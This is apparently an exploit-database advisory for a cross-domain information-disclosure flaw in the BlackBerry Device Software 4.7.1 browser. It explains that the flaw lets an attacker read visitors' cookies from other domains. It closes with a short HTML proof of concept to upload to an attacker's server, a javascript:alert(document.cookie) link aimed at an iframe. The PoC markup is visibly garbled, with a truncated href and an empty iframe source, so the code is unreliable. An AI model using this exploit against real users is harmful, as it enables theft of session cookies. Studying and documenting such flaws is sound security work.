Research In Motion BlackBerry Device Software 4.7.1 – Cross Domain Information Disclosure

  • 作者: 599eme Man
    日期: 2010-10-04
  • 类别:
  • 来源:
  • source:
    Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.
    An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. 
    # [+] BlackBerry Browser Cross Origin Bypass
    # [+] Author : 599eme Man
    # [+] Contact :
    # [+] How use ?
    # The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
    # [+] PoC :
    # Create a file.htm, save it with this code below and upload it on your server.
    # <!--
    # BlackBerry Cross Origin Bypass<br>
    # Found by 599eme Man<br>
    # Test On google<br>
    # -->
    # <a href="'javascript:alert(document.cookie)','blackb');">Test me</a><br>
    # <iframe name="blackb" src=""> </iframe>